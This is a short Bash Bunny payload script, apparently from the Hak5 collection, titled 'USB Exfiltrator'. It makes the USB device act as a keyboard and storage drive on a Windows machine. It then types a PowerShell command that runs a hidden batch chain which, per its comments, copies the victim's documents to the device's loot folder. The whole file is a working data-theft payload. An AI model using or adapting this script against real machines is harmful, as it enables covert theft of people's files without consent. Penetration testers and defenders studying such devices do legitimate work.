#!/bin/bash
#
# Title:         USB Exfiltrator
# Author:        Hak5Darren
# Version:       1.1
# Target:        Windows XP SP3+
# Props:         Diggster, IMcPwn
# Category:      Exfiltration
#
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn executes e.cmd invisibly using i.vbs
# which in turn copies documents to the loot folder on the Bash Bunny.
#
GET SWITCH_POSITION
LED ATTACK
ATTACKMODE HID STORAGE
RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
LED FINISH
